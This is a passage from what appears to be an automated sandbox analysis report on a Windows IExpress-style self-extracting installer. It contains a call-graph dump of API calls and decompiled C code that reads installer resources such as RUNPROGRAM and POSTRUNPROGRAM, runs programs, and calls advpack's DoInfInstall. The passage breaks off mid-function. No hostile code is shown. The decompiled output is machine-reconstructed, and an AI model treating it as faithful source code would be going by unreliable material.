API calls 2691->2692 2692->2696 2693 1f6ce0 4 API calls 2697 1f2f7e 2693->2697 2698 1f56c3 2694->2698 2701 1f56eb 2694->2701 2699 1f5678 2695->2699 2696->2693 2697->2449 2697->2472 2834 1f5467 2698->2834 2699->2696 2702 1f44b9 20 API calls 2699->2702 2701->2696 2703 1f586c GetWindowsDirectoryA 2701->2703 2704 1f5717 GetDriveTypeA 2701->2704 2702->2696 2868 1f597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2706 1f5730 GetFileAttributesA 2704->2706 2719 1f572b 2704->2719 2706->2719 2710 1f5467 49 API calls 2710->2701 2711 1f2630 21 API calls 2711->2719 2713 1f57c1 GetWindowsDirectoryA 2713->2719 2714 1f658a CharPrevA 2716 1f57e8 GetFileAttributesA 2714->2716 2715 1f597d 34 API calls 2715->2719 2717 1f57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 1f5827 SetFileAttributesA 2718->2719 2719->2696 2719->2703 2719->2704 2719->2706 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 1f5467 49 API calls 2719->2720 2864 1f6952 2719->2864 2720->2719 2722 1f6249 2721->2722 2723 1f6268 2721->2723 2724 1f44b9 20 API calls 2722->2724 2725 1f597d 34 API calls 2723->2725 2726 1f625a 2724->2726 2727 1f625f 2725->2727 2728 1f6285 GetLastError 2726->2728 2729 1f6ce0 4 API calls 2727->2729 2728->2727 2730 1f3013 2729->2730 2730->2455 2730->2472 2732 1f3b2d 2731->2732 2732->2732 2733 1f3b72 2732->2733 2734 1f3b53 2732->2734 2934 1f4fe0 2733->2934 2736 1f6517 24 API calls 2734->2736 2737 1f3b70 2736->2737 2738 1f6298 10 API calls 2737->2738 2739 1f3b7b 2737->2739 2738->2739 2739->2460 2741 1f2583 2740->2741 2742 1f2622 2740->2742 2744 1f258b 2741->2744 2745 1f25e8 RegOpenKeyExA 2741->2745 2961 1f24e0 GetWindowsDirectoryA 2742->2961 2746 1f25e3 2744->2746 2749 1f259b RegOpenKeyExA 2744->2749 2745->2746 2747 1f2609 RegQueryInfoKeyA 2745->2747 2746->2466 2748 1f25d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1f25bc RegQueryValueExA 2749->2750 2750->2748 2752 1f3bdb 2751->2752 2760 1f3bec 2751->2760 2753 1f468f 7 API calls 2752->2753 2753->2760 2754 
1f3c03 memset 2754->2760 2755 1f3d13 2756 1f44b9 20 API calls 2755->2756 2757 1f3d26 2756->2757 2759 1f6ce0 4 API calls 2757->2759 2761 1f3f60 2759->2761 2760->2754 2760->2755 2760->2757 2762 1f3d7b CompareStringA 2760->2762 2763 1f3fd7 2760->2763 2765 1f3fab 2760->2765 2768 1f3f1e LocalFree 2760->2768 2769 1f3f46 LocalFree 2760->2769 2772 1f468f 7 API calls 2760->2772 2774 1f3cc7 CompareStringA 2760->2774 2785 1f3e10 2760->2785 2969 1f1ae8 2760->2969 3010 1f202a memset memset RegCreateKeyExA 2760->3010 3036 1f3fef 2760->3036 2761->2470 2762->2760 2762->2763 2763->2757 3060 1f2267 2763->3060 2767 1f44b9 20 API calls 2765->2767 2771 1f3fbe LocalFree 2767->2771 2768->2760 2768->2763 2769->2757 2771->2757 2772->2760 2774->2760 2775 1f3e1f GetProcAddress 2778 1f3f64 2775->2778 2775->2785 2776 1f3f92 2777 1f44b9 20 API calls 2776->2777 2779 1f3fa9 2777->2779 2780 1f44b9 20 API calls 2778->2780 2781 1f3f7c LocalFree 2779->2781 2782 1f3f75 FreeLibrary 2780->2782 2783 1f6285 GetLastError 2781->2783 2782->2781 2784 1f3f8b 2783->2784 2784->2757 2785->2775 2785->2776 2786 1f3eff FreeLibrary 2785->2786 2787 1f3f40 FreeLibrary 2785->2787 3050 1f6495 2785->3050 2786->2768 2787->2769 2789 1f468f 7 API calls 2788->2789 2790 1f3a55 LocalAlloc 2789->2790 2791 1f3a8e 2790->2791 2792 1f3a6c 2790->2792 2794 1f468f 7 API calls 2791->2794 2793 1f44b9 20 API calls 2792->2793 2795 1f3a7d 2793->2795 2796 1f3a98 2794->2796 2797 1f6285 GetLastError 2795->2797 2798 1f3a9c 2796->2798 2799 1f3ac5 lstrcmpA 2796->2799 2800 1f2f64 2797->2800 2801 1f44b9 20 API calls 2798->2801 2802 1f3b0d LocalFree 2799->2802 2803 1f3ada 2799->2803 2800->2438 2800->2472 2805 1f3aad LocalFree 2801->2805 2802->2800 2804 1f6517 24 API calls 2803->2804 2806 1f3aec LocalFree 2804->2806 2805->2800 2806->2800 2808 1f628f 2807->2808 2808->2472 2810 1f468f 7 API calls 2809->2810 2811 1f417d LocalAlloc 2810->2811 2812 1f41a8 2811->2812 2813 1f4195 2811->2813 2815 1f468f 7 API calls 2812->2815 2814 1f44b9 20 API calls 
2813->2814 2816 1f41a6 2814->2816 2817 1f41b5 2815->2817 2816->2472 2818 1f41b9 2817->2818 2819 1f41c5 lstrcmpA 2817->2819 2821 1f44b9 20 API calls 2818->2821 2819->2818 2820 1f41e6 LocalFree 2819->2820 2820->2816 2821->2820 2823 1f171e _vsnprintf 2822->2823 2824 1f62c9 FindResourceA 2823->2824 2826 1f62cb LoadResource LockResource 2824->2826 2827 1f6353 2824->2827 2826->2827 2830 1f62e0 2826->2830 2828 1f6ce0 4 API calls 2827->2828 2829 1f51ca 2828->2829 2829->2671 2829->2672 2831 1f631b FreeResource 2830->2831 2832 1f6355 FreeResource 2830->2832 2833 1f171e _vsnprintf 2831->2833 2832->2827 2833->2824 2835 1f551a 2834->2835 2836 1f548a 2834->2836 2905 1f58c8 2835->2905 2894 1f53a1 2836->2894 2840 1f5495 2843 1f550c 2840->2843 2844 1f54c2 GetSystemInfo 2840->2844 2848 1f5581 2840->2848 2841 1f6ce0 4 API calls 2845 1f559a 2841->2845 2842 1f553b CreateDirectoryA 2846 1f5577 2842->2846 2847 1f5547 2842->2847 2850 1f658a CharPrevA 2843->2850 2855 1f54da 2844->2855 2845->2696 2858 1f2630 GetWindowsDirectoryA 2845->2858 2851 1f6285 GetLastError 2846->2851 2849 1f554d 2847->2849 2848->2841 2849->2848 2852 1f597d 34 API calls 2849->2852 2850->2835 2854 1f557c 2851->2854 2853 1f555c 2852->2853 2853->2848 2857 1f5568 RemoveDirectoryA 2853->2857 2854->2848 2855->2843 2856 1f658a CharPrevA 2855->2856 2856->2843 2857->2848 2859 1f266f 2858->2859 2860 1f265e 2858->2860 2862 1f6ce0 4 API calls 2859->2862 2861 1f44b9 20 API calls 2860->2861 2861->2859 2863 1f2687 2862->2863 2863->2701 2863->2710 2865 1f696e GetDiskFreeSpaceA 2864->2865 2866 1f69a1 2864->2866 2865->2866 2867 1f6989 MulDiv 2865->2867 2866->2719 2867->2866 2869 1f59dd GetDiskFreeSpaceA 2868->2869 2870 1f59bb 2868->2870 2872 1f5ba1 memset 2869->2872 2873 1f5a21 MulDiv 2869->2873 2871 1f44b9 20 API calls 2870->2871 2874 1f59cc 2871->2874 2875 1f6285 GetLastError 2872->2875 2873->2872 2876 1f5a50 GetVolumeInformationA 2873->2876 2877 1f6285 GetLastError 2874->2877 2878 1f5bbc GetLastError FormatMessageA 2875->2878 2879 
1f5a6e memset 2876->2879 2880 1f5ab5 SetCurrentDirectoryA 2876->2880 2881 1f59d1 2877->2881 2882 1f5be3 2878->2882 2883 1f6285 GetLastError 2879->2883 2889 1f5acc 2880->2889 2886 1f6ce0 4 API calls 2881->2886 2884 1f44b9 20 API calls 2882->2884 2885 1f5a89 GetLastError FormatMessageA 2883->2885 2887 1f5bf5 SetCurrentDirectoryA 2884->2887 2885->2882 2888 1f5c11 2886->2888 2887->2881 2888->2701 2890 1f5b0a 2889->2890 2892 1f5b20 2889->2892 2891 1f44b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 1f268b 2892->2917 2896 1f53bf 2894->2896 2895 1f171e _vsnprintf 2895->2896 2896->2895 2897 1f658a CharPrevA 2896->2897 2900 1f5415 GetTempFileNameA 2896->2900 2898 1f53fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 1f544f CreateDirectoryA 2898->2899 2899->2900 2901 1f543a 2899->2901 2900->2901 2902 1f5429 DeleteFileA CreateDirectoryA 2900->2902 2903 1f6ce0 4 API calls 2901->2903 2902->2901 2904 1f5449 2903->2904 2904->2840 2906 1f58d8 2905->2906 2906->2906 2907 1f58df LocalAlloc 2906->2907 2908 1f58f3 2907->2908 2911 1f5919 2907->2911 2909 1f44b9 20 API calls 2908->2909 2910 1f5906 2909->2910 2912 1f6285 GetLastError 2910->2912 2914 1f5534 2910->2914 2913 1f658a CharPrevA 2911->2913 2912->2914 2915 1f5931 CreateFileA LocalFree 2913->2915 2914->2842 2914->2849 2915->2910 2916 1f595b CloseHandle GetFileAttributesA 2915->2916 2916->2910 2918 1f26b9 2917->2918 2919 1f26e5 2917->2919 2920 1f171e _vsnprintf 2918->2920 2921 1f271f 2919->2921 2922 1f26ea 2919->2922 2924 1f26cc 2920->2924 2923 1f26e3 2921->2923 2926 1f171e _vsnprintf 2921->2926 2925 1f171e _vsnprintf 2922->2925 2927 1f6ce0 4 API calls 2923->2927 2928 1f44b9 20 API calls 2924->2928 2929 1f26fd 2925->2929 2930 1f2735 2926->2930 2931 1f276d 2927->2931 2928->2923 2932 1f44b9 20 API calls 2929->2932 2933 1f44b9 20 API calls 2930->2933 2931->2881 2932->2923 2933->2923 2935 1f468f 7 API calls 2934->2935 2936 1f4ff5 FindResourceA LoadResource LockResource 2935->2936 2937 1f515f 2936->2937 2938 1f5020 
2936->2938 2937->2737 2939 1f5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2938->2939 2940 1f5057 2938->2940 2939->2940 2953 1f4efd 2940->2953 2943 1f507c 2946 1f44b9 20 API calls 2943->2946 2950 1f5075 2943->2950 2944 1f5060 2945 1f44b9 20 API calls 2944->2945 2945->2950 2946->2950 2947 1f511d 2949 1f513a 2947->2949 2951 1f44b9 20 API calls 2947->2951 2948 1f5110 FreeResource 2948->2947 2949->2937 2952 1f514c SendMessageA 2949->2952 2950->2947 2950->2948 2951->2949 2952->2937 2954 1f4f4a 2953->2954 2955 1f4980 25 API calls 2954->2955 2960 1f4fa1 2954->2960 2958 1f4f67 2955->2958 2956 1f6ce0 4 API calls 2957 1f4fc6 2956->2957 2957->2943 2957->2944 2959 1f4b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 1f255b 2961->2962 2963 1f2510 2961->2963 2965 1f6ce0 4 API calls 2962->2965 2964 1f658a CharPrevA 2963->2964 2966 1f2522 WritePrivateProfileStringA _lopen 2964->2966 2967 1f2569 2965->2967 2966->2962 2968 1f2548 _llseek _lclose 2966->2968 2967->2746 2968->2962 2970 1f1b25 2969->2970 3074 1f1a84 2970->3074 2972 1f1b57 2973 1f658a CharPrevA 2972->2973 2975 1f1b8c 2972->2975 2973->2975 2974 1f66c8 2 API calls 2976 1f1bd1 2974->2976 2975->2974 2977 1f1bd9 CompareStringA 2976->2977 2978 1f1d73 2976->2978 2977->2978 2979 1f1bf7 GetFileAttributesA 2977->2979 2980 1f66c8 2 API calls 2978->2980 2981 1f1c0d 2979->2981 2982 1f1d53 2979->2982 2983 1f1d7d 2980->2983 2981->2982 2989 1f1a84 2 API calls 2981->2989 2984 1f1d64 2982->2984 2985 1f1df8 LocalAlloc 2983->2985 2986 1f1d81 CompareStringA 2983->2986 2987 1f44b9 20 API calls 2984->2987 2985->2984 2988 1f1e0b GetFileAttributesA 2985->2988 2986->2985 2995 1f1d9b 2986->2995 2990 1f1d6c 2987->2990 3001 1f1e1d 2988->3001 3009 1f1e45 2988->3009 2991 1f1c31 2989->2991 2994 1f6ce0 4 API calls 2990->2994 2992 1f1c50 LocalAlloc 2991->2992 2996 1f1a84 2 API calls 2991->2996 2992->2984 2993 1f1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2992->2993 3003 1f1cf8 2993->3003 3007 1f1cc2 2993->3007 
3000 1f1ea1 2994->3000 2995->2995 2997 1f1dbe LocalAlloc 2995->2997 2996->2992 2997->2984 3002 1f1de1 2997->3002 3000->2760 3001->3009 3004 1f171e _vsnprintf 3002->3004 3005 1f1d09 GetShortPathNameA 3003->3005 3006 1f1d23 3003->3006 3004->3007 3005->3006 3008 1f171e _vsnprintf 3006->3008 3007->2990 3008->3007 3080 1f2aac 3009->3080 3011 1f209a 3010->3011 3012 1f2256 3010->3012 3014 1f171e _vsnprintf 3011->3014 3017 1f20dc 3011->3017 3013 1f6ce0 4 API calls 3012->3013 3015 1f2263 3013->3015 3016 1f20af RegQueryValueExA 3014->3016 3015->2760 3016->3011 3016->3017 3018 1f20fb GetSystemDirectoryA 3017->3018 3019 1f20e4 RegCloseKey 3017->3019 3020 1f658a CharPrevA 3018->3020 3019->3012 3021 1f211b LoadLibraryA 3020->3021 3022 1f212e GetProcAddress FreeLibrary 3021->3022 3023 1f2179 GetModuleFileNameA 3021->3023 3022->3023 3025 1f214e GetSystemDirectoryA 3022->3025 3024 1f21de RegCloseKey 3023->3024 3028 1f2177 3023->3028 3024->3012 3026 1f2165 3025->3026 3025->3028 3027 1f658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1f21b7 LocalAlloc 3028->3029 3030 1f21cd 3029->3030 3031 1f21ec 3029->3031 3032 1f44b9 20 API calls 3030->3032 3033 1f171e _vsnprintf 3031->3033 3032->3024 3034 1f2218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3012 3037 1f4106 3036->3037 3038 1f4016 CreateProcessA 3036->3038 3041 1f6ce0 4 API calls 3037->3041 3039 1f40c4 3038->3039 3040 1f4041 WaitForSingleObject GetExitCodeProcess 3038->3040 3042 1f6285 GetLastError 3039->3042 3043 1f4070 3040->3043 3044 1f4117 3041->3044 3046 1f40c9 GetLastError FormatMessageA 3042->3046 3107 1f411b 3043->3107 3044->2760 3048 1f44b9 20 API calls 3046->3048 3047 1f4096 CloseHandle CloseHandle 3047->3037 3049 1f40ba 3047->3049 3048->3037 3049->3037 3051 1f64c2 3050->3051 3052 1f658a CharPrevA 3051->3052 3053 1f64d8 GetFileAttributesA 3052->3053 3054 1f64ea 3053->3054 3055 1f6501 LoadLibraryA 3053->3055 3054->3055 3056 1f64ee LoadLibraryExA 3054->3056 3057 1f6508 3055->3057 3056->3057 3058 1f6ce0 4 API 
calls 3057->3058 3059 1f6513 3058->3059 3059->2785 3061 1f2289 RegOpenKeyExA 3060->3061 3062 1f2381 3060->3062 3061->3062 3064 1f22b1 RegQueryValueExA 3061->3064 3063 1f6ce0 4 API calls 3062->3063 3065 1f238c 3063->3065 3066 1f22e6 memset GetSystemDirectoryA 3064->3066 3067 1f2374 RegCloseKey 3064->3067 3065->2757 3068 1f230f 3066->3068 3069 1f2321 3066->3069 3067->3062 3070 1f658a CharPrevA 3068->3070 3071 1f171e _vsnprintf 3069->3071 3070->3069 3072 1f233f RegSetValueExA 3071->3072 3072->3067 3075 1f1a9a 3074->3075 3077 1f1aba 3075->3077 3079 1f1aaf 3075->3079 3093 1f667f 3075->3093 3077->2972 3078 1f667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 1f2be6 3080->3081 3082 1f2ad4 GetModuleFileNameA 3080->3082 3083 1f6ce0 4 API calls 3081->3083 3092 1f2b02 3082->3092 3084 1f2bf5 3083->3084 3084->2990 3085 1f2af1 IsDBCSLeadByte 3085->3092 3086 1f2bca CharNextA 3089 1f2bd3 CharNextA 3086->3089 3087 1f2b11 CharNextA CharUpperA 3088 1f2b8d CharUpperA 3087->3088 3087->3092 3088->3092 3089->3092 3091 1f2b43 CharPrevA 3091->3092 3092->3081 3092->3085 3092->3086 3092->3087 3092->3089 3092->3091 3098 1f65e8 3092->3098 3094 1f6689 3093->3094 3095 1f66a5 3094->3095 3096 1f6648 IsDBCSLeadByte 3094->3096 3097 1f6697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 1f65f4 3098->3099 3099->3099 3100 1f65fb CharPrevA 3099->3100 3101 1f6611 CharPrevA 3100->3101 3102 1f661e 3101->3102 3103 1f660b 3101->3103 3104 1f663d 3102->3104 3105 1f6627 CharPrevA 3102->3105 3106 1f6634 CharNextA 3102->3106 3103->3101 3103->3102 3104->3092 3105->3104 3105->3106 3106->3104 3108 1f4132 3107->3108 3110 1f412a 3107->3110 3111 1f1ea7 3108->3111 3110->3047 3112 1f1eba 3111->3112 3113 1f1ed3 3111->3113 3114 1f256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 1f2026 3115->3116 3117 1f1ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 1f200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3267 1f6a20 __getmainargs 3268 1f19e0 3269 1f1a24 GetDesktopWindow 3268->3269 3270 
1f1a03 3268->3270 3271 1f43d0 11 API calls 3269->3271 3272 1f1a16 EndDialog 3270->3272 3274 1f1a20 3270->3274 3273 1f1a33 LoadStringA SetDlgItemTextA MessageBeep 3271->3273 3272->3274 3273->3274 3275 1f6ce0 4 API calls 3274->3275 3276 1f1a7e 3275->3276

Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F3BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0x1f9124 =  *0x1f9124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0x1f8a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0x1f8c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E001F468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E001F1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E001F6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E001F3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x1f8580;
													if( *0x1f8580 != 0) {
														E001F2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x1f8180;
											if( *0x1f8180 == 0) {
												_t146 = 0x4c7;
												E001F44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x1f9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x1f9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E001F6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E001F44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x1f9124 = E001F6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E001F44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x1f8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x1f9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x1f8a38 & 0x0000ffff;
											_v380 = 0x1f9154;
											_v376 = _t151;
											_v372 = 0x1f91e4;
											_v360 = _t97;
											if( *0x1f8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x1f9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x1f8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x1f9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x1fa288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x1f9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x1f9a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0x1f8a20;
                                                                                                                                                                                                        										if( *0x1f8a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E001F202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E001F468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0x1f8c42;
                                                                                                                                                                                                        									if( *0x1f8c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0x1f8a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E001F468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E001F468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
